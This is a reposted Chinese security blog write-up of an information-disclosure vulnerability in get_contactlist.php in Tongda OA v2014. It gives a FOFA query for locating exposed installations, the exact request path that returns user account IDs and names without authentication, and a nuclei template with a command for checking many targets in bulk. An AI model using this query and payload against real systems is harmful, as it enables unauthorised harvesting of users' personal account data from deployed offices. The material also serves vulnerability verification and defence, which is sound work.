通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

通达OA(OfficeAnywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达oa v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击.

图片[1]-通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

fofaapp=”TDXK-通达OA”

1.访问漏洞url,回显出unicode编码的账户信息


/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3
图片[2]-通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞-渗透云记 - 专注于网络安全与技术分享

2.解码,得到账户敏感信息

图片[3]-通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞-渗透云记 - 专注于网络安全与技术分享

3.编写nuclei脚本进行验证

nuclei命令(-u可改为-l批量验证):
nuclei.exe -t tongdaOA_get_contactlist.yaml -u http://x.x.x.x

脚本:
id: TongdaOA_get_contactlist
 
info:
  name: Tongda OA get_contactlist.php 
  author: sm
  severity: medium 
 
requests:
  - method: GET
    path:
      - "{{BaseURL}}/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3"

    matchers:
      - type: word
        words:
          - "user_uid"
          - "user_name"
          - "user_id"
        condition: and
© 版权声明
THE END
喜欢就支持一下吧
点赞13 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容